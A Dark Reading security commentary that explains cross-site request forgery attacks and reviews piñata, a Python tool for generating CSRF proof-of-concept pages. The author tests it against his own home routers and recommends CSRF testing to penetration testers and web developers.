informa
Commentary

CSRF Attacks Get New PoC Creation Tool

Cross site request forgery (CSRF) is a powerful attack that can have devastating consequences. It's not a new attack, but new tools are released every year because Web developers don't always write secure code that can prevent these attacks. Often, CSRF vulnerabilities go undetected because automated scanners have difficulty detecting them.
Cross site request forgery (CSRF) is a powerful attack that can have devastating consequences. It's not a new attack, but new tools are released every year because Web developers don't always write secure code that can prevent these attacks. Often, CSRF vulnerabilities go undetected because automated scanners have difficulty detecting them.OWASP states that the vulnerability is widespread and can affect any Web application that does not check authorization on vulnerable actions, will process an action if a default login can be passed via the Web request, and authorizes requests based only on credentials automatically submitted such as in a single sign-on environment.

Sounds interesting, right? So what can you do with CSRF? There are a slew of different options, and it depends on the vulnerable Web application. For example, I grabbed two wireless routers I had sitting in my office. One was from Netgear and the other from Linksys. A quick test showed both were vulnerable to CSRF, and I could create a Web page that would log me out of both just by opening the page in my browser while logged in. Not particularly exciting, but it gets worse.

In the SANS SEC 560 course, there is an exercise where the students demonstrate CSRF attacks against a fictitious banking site. The attack allows the students to transfer money from victims' accounts into their own. Similar to the router CSRF attack I mentioned above, there have been several proof-of-concepts where researchers have shown how consumer routers could be modified to point to malicious DNS servers in order to redirect valid traffic to the attacker's servers.

A new tool for creating proof-of-concept CSRF attacks was released recently called piñata. It is written in Python and designed to take a HTTP request for the vulnerable Web page and turn it into a HTML file containing the CSRF attack. It works for both GET and POSTs. I tested the tool with several requests against my vulnerable wireless routers by first grabbing the HTTP request via Paros proxy.

The first several test runs through errors that required me to clean up the requests. It seems the piñata was having trouble parsing the User Agent string in my requests. Once I trimmed it to one value, piñata created the appropriate CSRF attack file. I had similar problems with both GETs and POSTs, but was able to get them to work eventually.

The feature I particularly like is the ability to create CSRF attacks against forms that use the POST method. Piñata creates an attack file with JavaScript that automatically submits the form with the appropriate form values...a big time-saver.

If you spend any time penetration testing Web applications or work with your Web developers to ensure their code is secure, then make sure you're testing for CSRF vulnerabilities. Maybe by then some of the bugs in piñata will have been worked out. It's definitely a good start for those not familiar with what it takes to craft a CSRF attack using POSTs and JavaScript.

John H. Sawyer is a senior security engineer on the IT Security Team at the University of Florida. The views and opinions expressed in this blog are his own and do not represent the views and opinions of the UF IT Security Team or the University of Florida. When John's not fighting flaming, malware-infested machines or performing autopsies on blitzed boxes, he can usually be found hanging with his family, bouncing a baby on one knee and balancing a laptop on the other. Special to Dark Reading.

Recommended Reading: